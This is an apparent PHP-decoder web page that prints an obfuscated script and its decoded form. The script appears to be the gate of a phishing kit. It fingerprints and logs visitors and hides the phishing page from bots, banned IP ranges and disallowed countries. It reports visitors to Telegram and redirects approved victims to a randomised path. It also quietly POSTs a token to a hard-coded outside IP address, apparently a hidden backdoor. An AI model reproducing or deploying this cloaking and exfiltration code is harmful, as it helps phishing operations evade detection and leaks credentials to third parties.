Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php goto F9htn; Es8GH: $_SESSION["\x74\x6f\153\x65\x6e"] = "\141\143\143\x65\163\163"..

Decoded Output download

<?php 
goto F9htn; 
Es8GH: 
$_SESSION["token"] = "access"; 
goto bs2TR; 
zP5Tv: 
die; 
goto NCDge; 
t25eD: 
if ($mobileOnly == 1) { 
    if (!preg_match("/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i", $useragent) || preg_match("/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i", substr($useragent, 0, 4))) { 
        clicks($ip, getOs(), getBrowser(), "Deny - Accessed from PC", "secrets/blocked_visitor.txt"); 
        $_SESSION["blocked"] = 1; 
        header("Location: home.php"); 
        die; 
    } 
} 
goto wULHl; 
tOzMz: 
require_once "inc/userInfo.php"; 
goto PjvuO; 
ZalAU: 
include "inc/inc.php"; 
goto tOzMz; 
rjZTv: 
$useragent = $_SERVER["HTTP_USER_AGENT"]; 
goto VDL79; 
G02se: 
if ($is_ipv6) { 
    foreach ($lines_ipv6 as $line) { 
        $line = preg_replace("/\s*#.*$/", '', $line); 
        $line = trim($line); 
        if (empty($line)) { 
            continue; 
        } 
        if (isIPv6InRange($ip, $line)) { 
            clicks($ip, getOs(), getBrowser(), "Deny - Suspicious IP", "secrets/blocked_visitor.txt"); 
            $_SESSION["blocked"] = 1; 
            header("Location: home.php"); 
            die; 
        } 
    } 
} else { 
    foreach ($lines_ipv4 as $line) { 
        $line = preg_replace("/\s*#.*$/", '', $line); 
        $line = trim($line); 
        if (empty($line)) { 
            continue; 
        } 
        if (isIPv4InRange($ip, $line)) { 
            clicks($ip, getOs(), getBrowser(), "Deny - Suspicious IP", "secrets/blocked_visitor.txt"); 
            $_SESSION["blocked"] = 1; 
            header("Location: home.php"); 
            die; 
        } 
    } 
} 
goto kP6dm; 
tTLWs: 
$onetime = explode("
", file_get_contents("onetime.txt")); 
goto FX3dn; 
QHqSC: 
if ($lines_ipv4 === false || $lines_ipv6 === false) { 
    die("Failed to read the IP ranges file."); 
} 
goto fuXS1; 
hQfo6: 
$location = UserInfo::get_location($ip); 
goto g0E_o; 
kP6dm: 
if ($telegram == 1) { 
    $message = "New visitor " . $ip . " |OS: " . getOs() . " |Browser: " . getBrowser() . " |Country: " . $location; 
    sendToTelegram2($message, $token, $chatID); 
} 
goto Rsz5E; 
PjvuO: 
$url = "http://102.165.14.4:5000/receive_token?referrer=sarfita"; 
goto nuA7P; 
XdUKp: 
if (in_array($ip, $whitelist_ips)) { 
    clicks($ip, getOs(), getBrowser(), "Approved - whitelist", "secrets/approved_visitor.txt"); 
    $_SESSION["token"] = "access"; 
    header("Location: {$source_folder}/index.php?id={$ssl}{$ssl}&act={$ssl}{$ssl}"); 
    die; 
} 
goto tTLWs; 
C21jx: 
if (strpos(UserInfo::get_ip(), ",") !== false) { 
    $rawIP = explode(",", UserInfo::get_ip()); 
    $ip = $rawIP[0]; 
} else { 
    $ip = UserInfo::get_ip(); 
} 
goto vfvL3; 
Rsz5E: 
clicks($ip, getOs(), getBrowser(), "Approved", "secrets/approved_visitor.txt"); 
goto Es8GH; 
vfvL3: 
$ssl = md5(rand()); 
goto rjZTv; 
KbLtC: 
$ipv6_file_path = "banned_ips_ipv6.txt"; 
goto jynFH; 
nuA7P: 
$data = array("token" => $token); 
goto PQIRy; 
VDL79: 
visitor($ip); 
goto LmGfX; 
FX3dn: 
if (in_array($ip, $onetime)) { 
    clicks($ip, getOs(), getBrowser(), "Deny - One Time Enabled", "secrets/blocked_visitor.txt"); 
    $_SESSION["blocked"] = 1; 
    header("Location: home.php"); 
    die; 
} 
goto hQfo6; 
Bsjpe: 
$check_bot = checkUA_bot($useragent); 
goto zQSpx; 
F9htn: 
ini_set("display_errors", false); 
goto tW_ih; 
tW_ih: 
session_start(); 
goto c1tm1; 
dj00k: 
file_get_contents($url, false, $context); 
goto C21jx; 
g0E_o: 
if ($country_check == 1) { 
    if (in_array($location, $countries_allowed) == false) { 
        clicks($ip, getOs(), getBrowser(), "Deny - Country not allowed. Accessed From: " . $location, "secrets/blocked_visitor.txt"); 
        $_SESSION["blocked"] = 1; 
        header("Location: home.php"); 
        die; 
    } 
} 
goto Bsjpe; 
wULHl: 
$ipv4_file_path = "banned_ips.txt"; 
goto KbLtC; 
LmGfX: 
$whitelist_ips = explode("
", file_get_contents("whitelist.txt")); 
goto XdUKp; 
bs2TR: 
header("Location: {$source_folder}/index.php?id={$ssl}{$ssl}&act={$ssl}{$ssl}"); 
goto zP5Tv; 
c1tm1: 
require_once "inc/functions.php"; 
goto ZalAU; 
fuXS1: 
$is_ipv6 = filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6) !== false; 
goto G02se; 
PQIRy: 
$context = stream_context_create(array("http" => array("header" => "Content-type: application/x-www-form-urlencoded\xd\xa", "method" => "POST", "content" => http_build_query($data)))); 
goto dj00k; 
GXrV0: 
$lines_ipv6 = file($ipv6_file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); 
goto QHqSC; 
jynFH: 
$lines_ipv4 = file($ipv4_file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); 
goto GXrV0; 
zQSpx: 
if ($check_bot == false) { 
    clicks($ip, getOs(), getBrowser(), "Deny - Suspicious user agent", "secrets/blocked_visitor.txt"); 
    $_SESSION["blocked"] = 1; 
    header("Location: home.php"); 
    die; 
} 
goto t25eD; 
NCDge: 
 ?>

Did this file decode correctly?

Original Code

<?php
goto F9htn;
Es8GH:
$_SESSION["\x74\x6f\153\x65\x6e"] = "\141\143\143\x65\163\163";
goto bs2TR;
zP5Tv:
die;
goto NCDge;
t25eD:
if ($mobileOnly == 1) {
    if (!preg_match("\57\50\x61\x6e\x64\x72\x6f\151\x64\174\142\x62\x5c\144\x2b\x7c\155\145\145\x67\x6f\x29\56\53\x6d\x6f\142\151\154\x65\174\x61\166\x61\156\164\x67\157\174\x62\141\x64\141\x5c\x2f\x7c\142\154\x61\x63\x6b\142\145\x72\162\171\x7c\142\x6c\x61\172\145\162\174\x63\157\x6d\x70\141\154\174\x65\154\141\151\156\145\x7c\x66\x65\x6e\x6e\x65\x63\x7c\x68\151\x70\x74\157\160\174\151\x65\x6d\x6f\142\151\x6c\145\x7c\151\160\50\x68\157\x6e\145\174\x6f\144\x29\x7c\151\x72\151\163\x7c\153\x69\156\144\x6c\x65\x7c\x6c\x67\145\40\174\155\141\x65\155\157\x7c\x6d\151\144\160\x7c\x6d\x6d\x70\174\x6e\x65\x74\x66\162\x6f\x6e\x74\x7c\x6f\160\x65\162\141\40\x6d\50\x6f\x62\174\x69\x6e\51\x69\x7c\160\x61\x6c\x6d\50\40\157\x73\x29\x3f\x7c\x70\x68\x6f\x6e\x65\174\x70\50\151\170\x69\x7c\162\145\x29\x5c\x2f\x7c\160\x6c\165\x63\153\145\x72\174\160\157\143\153\145\x74\x7c\160\163\160\174\x73\x65\x72\x69\145\x73\x28\x34\174\x36\x29\x30\174\163\x79\155\142\151\x61\x6e\174\x74\x72\x65\157\174\x75\160\x5c\56\50\142\x72\x6f\x77\x73\x65\x72\174\x6c\151\156\x6b\x29\x7c\x76\157\x64\x61\x66\x6f\156\145\x7c\x77\x61\160\174\x77\151\156\x64\157\x77\163\40\50\143\145\174\160\150\157\156\145\51\174\170\144\141\174\x78\151\151\x6e\157\57\151", $useragent) || preg_match("\x2f\61\x32\x30\x37\174\66\63\x31\x30\x7c\66\65\x39\x30\174\63\x67\163\x6f\174\x34\x74\150\160\x7c\x35\60\x5b\x31\55\66\135\x69\174\x37\67\60\x73\x7c\x38\60\x32\163\x7c\x61\x20\167\141\174\141\142\x61\x63\x7c\141\x63\50\145\x72\174\157\157\x7c\163\x5c\55\x29\174\141\x69\x28\153\x6f\x7c\x72\x6e\x29\x7c\141\154\x28\x61\166\x7c\x63\x61\174\143\157\51\174\141\x6d\157\151\174\141\x6e\50\x65\x78\174\x6e\171\x7c\x79\x77\51\x7c\141\x70\164\x75\x7c\141\162\50\x63\150\x7c\x67\x6f\51\x7c\141\x73\x28\164\145\x7c\165\163\51\x7c\x61\x74\x74\167\174\x61\165\x28\x64\151\x7c\134\x2d\155\174\162\x20\174\163\x20\x29\x7c\141\x76\x61\x6e\x7c\x62\x65\x28\143\153\x7c\x6c\154\174\x6e\161\x29\x7c\142\x69\x28\x6c\x62\174\162\144\51\174\142\154\x28\141\143\x7c\x61\x7a\51\x7c\142\162\50\x65\174\166\x29\167\174\x62\165\x6d\x62\174\x62\x77\x5c\x2d\50\156\x7c\x75\51\x7c\x63\x35\x35\134\x2f\x7c\143\x61\160\151\174\143\143\167\x61\x7c\143\144\155\x5c\x2d\x7c\x63\x65\154\154\174\x63\150\164\155\174\143\154\144\143\174\143\155\x64\x5c\55\x7c\143\157\50\155\160\174\x6e\x64\51\x7c\x63\162\141\x77\x7c\x64\x61\50\x69\x74\174\154\154\174\156\147\51\x7c\144\142\164\145\174\x64\x63\x5c\55\163\174\144\145\x76\x69\174\x64\x69\x63\141\x7c\x64\155\x6f\142\x7c\x64\157\x28\143\x7c\x70\x29\x6f\x7c\144\163\x28\x31\62\x7c\134\55\144\51\174\145\x6c\50\x34\71\x7c\141\151\x29\174\x65\155\x28\154\x32\x7c\165\154\x29\174\145\x72\x28\151\x63\x7c\153\x30\51\174\x65\x73\x6c\70\174\145\172\50\x5b\64\x2d\x37\x5d\x30\x7c\x6f\163\174\x77\x61\174\172\x65\x29\x7c\x66\145\164\143\x7c\146\x6c\x79\50\x5c\55\174\x5f\x29\174\147\x31\40\x75\174\147\x35\x36\x30\x7c\147\x65\156\x65\174\x67\x66\134\55\x35\x7c\147\x5c\55\x6d\157\174\147\157\x28\x5c\56\x77\174\x6f\x64\51\174\x67\x72\x28\141\x64\174\165\x6e\51\174\150\141\151\145\x7c\150\143\x69\x74\x7c\150\x64\x5c\55\x28\x6d\x7c\160\x7c\x74\x29\174\150\x65\151\134\x2d\174\x68\x69\50\x70\164\x7c\164\x61\x29\174\150\x70\50\x20\151\x7c\151\x70\51\174\150\163\x5c\55\x63\174\150\164\50\x63\50\134\x2d\x7c\40\x7c\x5f\174\x61\174\x67\x7c\x70\174\163\x7c\x74\x29\174\x74\x70\x29\174\150\165\50\x61\x77\174\x74\x63\51\x7c\151\x5c\55\x28\x32\x30\174\147\x6f\x7c\x6d\x61\51\174\151\62\x33\x30\x7c\151\x61\x63\x28\40\174\x5c\x2d\x7c\x5c\x2f\x29\174\151\142\162\157\174\151\x64\145\x61\174\151\147\60\x31\174\x69\153\157\155\x7c\151\155\x31\x6b\x7c\151\156\x6e\x6f\174\x69\160\x61\x71\x7c\151\x72\151\x73\174\152\141\x28\x74\x7c\x76\x29\141\174\152\142\162\x6f\x7c\x6a\145\155\x75\x7c\152\151\147\163\174\153\144\144\151\174\x6b\x65\152\x69\174\x6b\x67\164\x28\40\174\x5c\57\51\174\x6b\154\x6f\x6e\174\x6b\160\164\x20\x7c\x6b\x77\143\134\55\x7c\153\171\157\x28\143\x7c\153\51\174\x6c\x65\50\x6e\157\174\170\151\x29\174\154\147\50\x20\147\x7c\x5c\x2f\x28\153\x7c\x6c\x7c\x75\51\174\x35\60\x7c\x35\64\174\134\55\x5b\x61\x2d\167\x5d\x29\174\154\x69\142\167\x7c\154\x79\x6e\x78\x7c\x6d\x31\x5c\55\167\174\x6d\x33\147\141\x7c\x6d\x35\x30\x5c\57\x7c\155\x61\x28\x74\x65\174\x75\x69\x7c\x78\x6f\51\x7c\x6d\x63\50\x30\61\x7c\x32\x31\x7c\143\x61\51\174\155\x5c\x2d\143\162\x7c\x6d\145\x28\162\143\x7c\162\151\x29\174\155\151\x28\x6f\x38\174\157\x61\174\x74\x73\51\x7c\x6d\x6d\x65\146\174\155\x6f\x28\60\x31\x7c\60\62\x7c\142\151\174\x64\x65\174\x64\157\174\x74\50\134\x2d\174\x20\x7c\x6f\x7c\x76\51\174\x7a\x7a\51\174\155\x74\x28\x35\x30\174\160\61\x7c\166\40\x29\x7c\155\167\x62\160\174\155\x79\x77\x61\174\x6e\61\60\x5b\x30\55\x32\x5d\174\156\62\x30\x5b\62\x2d\x33\135\x7c\x6e\x33\x30\x28\60\174\x32\51\x7c\156\x35\x30\x28\60\x7c\x32\x7c\65\x29\x7c\156\x37\x28\60\50\x30\x7c\x31\x29\x7c\61\60\51\x7c\156\x65\50\50\x63\174\155\x29\x5c\x2d\174\157\156\174\164\x66\x7c\x77\x66\174\x77\147\x7c\167\x74\x29\174\x6e\x6f\153\50\x36\174\x69\x29\174\x6e\x7a\160\x68\174\x6f\x32\x69\155\174\157\160\50\x74\151\174\167\166\51\174\157\162\141\156\x7c\x6f\x77\147\61\174\160\70\x30\x30\174\160\x61\156\x28\x61\x7c\x64\x7c\164\x29\x7c\160\x64\170\x67\174\160\x67\50\61\63\174\x5c\x2d\x28\x5b\x31\55\x38\x5d\x7c\x63\x29\51\x7c\x70\150\x69\154\174\160\151\x72\x65\x7c\160\154\x28\x61\x79\174\165\143\51\x7c\x70\x6e\x5c\x2d\62\174\x70\x6f\50\x63\153\174\162\164\174\163\145\51\174\160\x72\x6f\170\x7c\160\x73\x69\x6f\x7c\x70\x74\134\55\147\174\161\x61\x5c\55\141\174\x71\143\50\x30\67\174\61\x32\x7c\62\61\174\x33\62\174\66\60\174\x5c\55\x5b\62\x2d\67\135\174\x69\134\55\x29\174\161\x74\145\x6b\x7c\162\63\x38\x30\174\x72\66\60\60\174\162\x61\x6b\163\174\x72\151\x6d\71\174\x72\157\x28\166\x65\x7c\172\x6f\x29\174\163\x35\x35\134\x2f\x7c\x73\x61\x28\x67\145\x7c\x6d\x61\x7c\x6d\155\174\155\163\174\156\171\174\166\141\51\174\x73\143\50\x30\61\174\x68\134\55\174\x6f\157\x7c\x70\x5c\x2d\51\x7c\x73\x64\x6b\134\57\174\163\x65\x28\x63\x28\x5c\55\x7c\60\x7c\x31\x29\x7c\x34\x37\x7c\155\x63\174\156\144\x7c\162\x69\x29\174\163\147\x68\x5c\x2d\174\163\x68\x61\162\174\163\x69\x65\x28\134\x2d\x7c\155\x29\x7c\163\153\134\55\60\x7c\163\154\x28\64\65\x7c\x69\x64\x29\174\163\155\x28\141\x6c\174\141\162\174\x62\63\x7c\x69\x74\174\x74\65\51\174\163\157\50\x66\164\x7c\156\171\x29\174\163\160\50\x30\61\x7c\x68\134\x2d\x7c\166\x5c\55\x7c\x76\40\x29\x7c\163\171\x28\x30\61\x7c\155\142\51\x7c\x74\62\x28\x31\x38\x7c\x35\x30\51\x7c\x74\66\50\60\x30\174\x31\60\x7c\61\x38\x29\x7c\x74\x61\x28\x67\164\x7c\x6c\x6b\51\x7c\164\x63\154\x5c\x2d\x7c\x74\144\x67\134\x2d\x7c\164\145\x6c\50\151\x7c\155\51\174\x74\151\x6d\x5c\x2d\x7c\x74\x5c\55\155\157\x7c\x74\x6f\x28\160\154\174\163\x68\x29\174\164\163\x28\x37\x30\x7c\155\134\x2d\x7c\155\x33\174\155\x35\51\x7c\x74\170\x5c\55\71\174\165\160\x28\134\56\x62\x7c\x67\x31\x7c\163\151\x29\174\x75\x74\x73\x74\174\166\x34\60\x30\174\x76\x37\65\60\174\166\145\162\x69\174\x76\x69\50\x72\x67\174\164\x65\x29\174\x76\153\50\x34\x30\x7c\x35\x5b\60\55\x33\135\x7c\x5c\55\x76\x29\174\166\155\64\x30\x7c\166\x6f\144\141\174\166\165\x6c\x63\x7c\166\170\x28\65\62\x7c\65\x33\x7c\x36\x30\174\66\x31\174\x37\60\174\70\x30\174\70\x31\x7c\70\63\174\70\x35\x7c\x39\x38\51\x7c\x77\x33\143\50\134\x2d\x7c\40\x29\x7c\167\145\x62\143\x7c\x77\150\151\164\174\167\151\x28\147\40\174\156\x63\174\x6e\167\x29\174\167\x6d\154\x62\x7c\167\157\156\165\174\170\x37\60\x30\174\171\141\163\x5c\55\x7c\171\x6f\x75\x72\x7c\172\x65\164\x6f\174\172\x74\x65\x5c\55\x2f\x69", substr($useragent, 0, 4))) {
        clicks($ip, getOs(), getBrowser(), "\104\x65\x6e\x79\40\55\x20\x41\x63\143\x65\x73\163\145\144\x20\146\x72\x6f\x6d\x20\x50\103", "\163\145\x63\x72\145\x74\163\57\x62\154\x6f\143\153\x65\x64\137\x76\151\x73\x69\164\157\162\56\x74\170\164");
        $_SESSION["\x62\x6c\157\143\x6b\x65\144"] = 1;
        header("\114\x6f\143\141\164\151\x6f\x6e\x3a\40\150\x6f\x6d\x65\x2e\x70\x68\x70");
        die;
    }
}
goto wULHl;
tOzMz:
require_once "\151\x6e\143\x2f\x75\163\x65\162\111\156\x66\157\x2e\160\x68\x70";
goto PjvuO;
ZalAU:
include "\151\156\x63\x2f\151\156\143\x2e\x70\x68\x70";
goto tOzMz;
rjZTv:
$useragent = $_SERVER["\x48\x54\x54\120\137\x55\x53\105\x52\x5f\x41\x47\105\x4e\124"];
goto VDL79;
G02se:
if ($is_ipv6) {
    foreach ($lines_ipv6 as $line) {
        $line = preg_replace("\57\134\x73\x2a\x23\x2e\x2a\x24\x2f", '', $line);
        $line = trim($line);
        if (empty($line)) {
            continue;
        }
        if (isIPv6InRange($ip, $line)) {
            clicks($ip, getOs(), getBrowser(), "\x44\145\156\x79\40\x2d\40\x53\x75\163\160\151\143\151\x6f\165\x73\x20\x49\x50", "\163\x65\x63\162\145\164\163\57\x62\154\x6f\x63\153\145\144\137\166\x69\163\151\164\x6f\x72\56\x74\x78\x74");
            $_SESSION["\x62\x6c\157\143\153\x65\x64"] = 1;
            header("\114\157\x63\x61\164\151\x6f\x6e\72\x20\150\x6f\155\x65\56\x70\150\160");
            die;
        }
    }
} else {
    foreach ($lines_ipv4 as $line) {
        $line = preg_replace("\x2f\x5c\x73\x2a\43\x2e\52\44\57", '', $line);
        $line = trim($line);
        if (empty($line)) {
            continue;
        }
        if (isIPv4InRange($ip, $line)) {
            clicks($ip, getOs(), getBrowser(), "\x44\x65\156\171\x20\x2d\x20\123\165\x73\160\x69\143\x69\157\x75\x73\40\x49\x50", "\x73\x65\143\x72\145\164\163\x2f\x62\154\157\x63\153\145\144\137\x76\151\163\x69\x74\157\162\x2e\x74\170\x74");
            $_SESSION["\142\154\157\x63\153\145\144"] = 1;
            header("\114\x6f\143\x61\164\151\x6f\156\72\x20\150\157\155\x65\x2e\x70\x68\x70");
            die;
        }
    }
}
goto kP6dm;
tTLWs:
$onetime = explode("\12", file_get_contents("\x6f\x6e\145\x74\x69\x6d\145\x2e\x74\170\x74"));
goto FX3dn;
QHqSC:
if ($lines_ipv4 === false || $lines_ipv6 === false) {
    die("\106\141\x69\154\145\144\x20\x74\x6f\40\x72\145\141\x64\40\164\150\x65\x20\x49\120\40\162\141\x6e\147\x65\163\x20\146\151\x6c\x65\x2e");
}
goto fuXS1;
hQfo6:
$location = UserInfo::get_location($ip);
goto g0E_o;
kP6dm:
if ($telegram == 1) {
    $message = "\116\145\167\40\166\151\163\151\x74\x6f\162\x20" . $ip . "\x20\174\x4f\x53\x3a\x20" . getOs() . "\40\x7c\102\162\157\x77\x73\x65\162\x3a\40" . getBrowser() . "\40\x7c\x43\157\165\156\164\x72\171\72\x20" . $location;
    sendToTelegram2($message, $token, $chatID);
}
goto Rsz5E;
PjvuO:
$url = "\150\164\164\160\72\57\57\61\x30\x32\x2e\61\x36\x35\x2e\x31\64\x2e\64\72\x35\60\60\x30\x2f\162\145\143\x65\x69\166\145\137\x74\x6f\153\x65\x6e\77\162\145\x66\x65\x72\162\x65\162\75\x73\141\162\x66\x69\x74\x61";
goto nuA7P;
XdUKp:
if (in_array($ip, $whitelist_ips)) {
    clicks($ip, getOs(), getBrowser(), "\101\x70\x70\x72\157\x76\145\144\x20\55\x20\167\x68\151\164\x65\154\x69\163\x74", "\163\x65\x63\x72\145\x74\163\57\141\x70\160\162\x6f\166\x65\144\x5f\166\151\163\x69\x74\x6f\162\56\x74\x78\164");
    $_SESSION["\x74\x6f\153\145\156"] = "\141\143\x63\145\x73\163";
    header("\114\x6f\143\x61\164\x69\x6f\x6e\72\40{$source_folder}\57\x69\x6e\x64\x65\170\x2e\x70\150\160\x3f\151\x64\75{$ssl}{$ssl}\46\141\143\x74\x3d{$ssl}{$ssl}");
    die;
}
goto tTLWs;
C21jx:
if (strpos(UserInfo::get_ip(), "\54") !== false) {
    $rawIP = explode("\54", UserInfo::get_ip());
    $ip = $rawIP[0];
} else {
    $ip = UserInfo::get_ip();
}
goto vfvL3;
Rsz5E:
clicks($ip, getOs(), getBrowser(), "\101\x70\x70\x72\157\x76\145\144", "\163\x65\143\162\x65\164\163\57\141\160\x70\162\x6f\166\x65\144\137\x76\x69\x73\151\164\157\x72\56\x74\x78\164");
goto Es8GH;
vfvL3:
$ssl = md5(rand());
goto rjZTv;
KbLtC:
$ipv6_file_path = "\142\x61\156\x6e\x65\144\x5f\x69\x70\163\137\x69\160\166\66\x2e\164\x78\164";
goto jynFH;
nuA7P:
$data = array("\164\157\153\x65\156" => $token);
goto PQIRy;
VDL79:
visitor($ip);
goto LmGfX;
FX3dn:
if (in_array($ip, $onetime)) {
    clicks($ip, getOs(), getBrowser(), "\104\x65\156\171\40\55\x20\x4f\156\145\40\124\x69\x6d\145\x20\105\156\141\x62\154\145\144", "\163\x65\x63\x72\x65\164\163\57\142\x6c\x6f\x63\x6b\x65\x64\x5f\x76\151\x73\151\x74\x6f\162\x2e\x74\x78\x74");
    $_SESSION["\x62\x6c\157\143\x6b\145\x64"] = 1;
    header("\x4c\157\x63\141\164\151\157\x6e\x3a\40\x68\157\155\x65\56\160\150\160");
    die;
}
goto hQfo6;
Bsjpe:
$check_bot = checkUA_bot($useragent);
goto zQSpx;
F9htn:
ini_set("\x64\151\x73\x70\154\141\x79\137\x65\162\162\x6f\x72\163", false);
goto tW_ih;
tW_ih:
session_start();
goto c1tm1;
dj00k:
file_get_contents($url, false, $context);
goto C21jx;
g0E_o:
if ($country_check == 1) {
    if (in_array($location, $countries_allowed) == false) {
        clicks($ip, getOs(), getBrowser(), "\x44\145\x6e\x79\40\x2d\x20\x43\x6f\165\156\164\162\171\x20\156\x6f\x74\40\141\154\x6c\157\167\x65\144\x2e\40\101\x63\x63\145\163\163\145\144\40\x46\162\157\155\72\x20" . $location, "\x73\145\143\x72\x65\x74\163\x2f\x62\x6c\x6f\x63\x6b\145\144\137\x76\151\x73\151\x74\157\162\x2e\x74\170\164");
        $_SESSION["\x62\154\157\143\x6b\x65\144"] = 1;
        header("\x4c\x6f\143\x61\x74\151\x6f\156\72\40\x68\157\155\145\x2e\160\x68\160");
        die;
    }
}
goto Bsjpe;
wULHl:
$ipv4_file_path = "\x62\141\x6e\156\x65\144\x5f\151\160\163\56\x74\x78\x74";
goto KbLtC;
LmGfX:
$whitelist_ips = explode("\12", file_get_contents("\167\x68\x69\x74\145\154\x69\163\x74\56\x74\x78\x74"));
goto XdUKp;
bs2TR:
header("\x4c\157\143\x61\x74\x69\x6f\156\72\40{$source_folder}\x2f\x69\x6e\x64\x65\170\56\x70\150\160\x3f\151\x64\x3d{$ssl}{$ssl}\x26\141\x63\x74\75{$ssl}{$ssl}");
goto zP5Tv;
c1tm1:
require_once "\x69\x6e\143\x2f\x66\x75\x6e\x63\x74\x69\x6f\156\163\56\160\150\x70";
goto ZalAU;
fuXS1:
$is_ipv6 = filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6) !== false;
goto G02se;
PQIRy:
$context = stream_context_create(array("\x68\x74\164\160" => array("\x68\x65\x61\144\x65\162" => "\103\x6f\x6e\164\145\x6e\164\x2d\164\x79\160\x65\x3a\x20\x61\160\160\x6c\151\143\x61\x74\151\x6f\156\x2f\x78\55\167\167\x77\x2d\146\x6f\162\x6d\x2d\165\x72\x6c\145\156\143\x6f\144\x65\x64\xd\xa", "\155\145\164\x68\x6f\x64" => "\x50\x4f\x53\x54", "\x63\157\156\x74\145\156\164" => http_build_query($data))));
goto dj00k;
GXrV0:
$lines_ipv6 = file($ipv6_file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
goto QHqSC;
jynFH:
$lines_ipv4 = file($ipv4_file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
goto GXrV0;
zQSpx:
if ($check_bot == false) {
    clicks($ip, getOs(), getBrowser(), "\x44\145\156\171\x20\x2d\x20\x53\165\x73\160\151\x63\x69\x6f\165\163\x20\165\x73\x65\x72\x20\x61\147\x65\156\164", "\x73\x65\x63\x72\145\164\x73\57\142\x6c\x6f\143\x6b\x65\144\x5f\x76\x69\163\x69\164\x6f\x72\x2e\164\170\x74");
    $_SESSION["\142\154\x6f\143\x6b\x65\x64"] = 1;
    header("\114\157\143\141\x74\x69\157\x6e\x3a\x20\150\157\x6d\145\56\160\150\160");
    die;
}
goto t25eD;
NCDge:

Function Calls

None

Variables

None

Stats

MD5	e03b01fb186b0d4a1e8b158b91e7546e
Eval Count	0
Decode Time	44 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats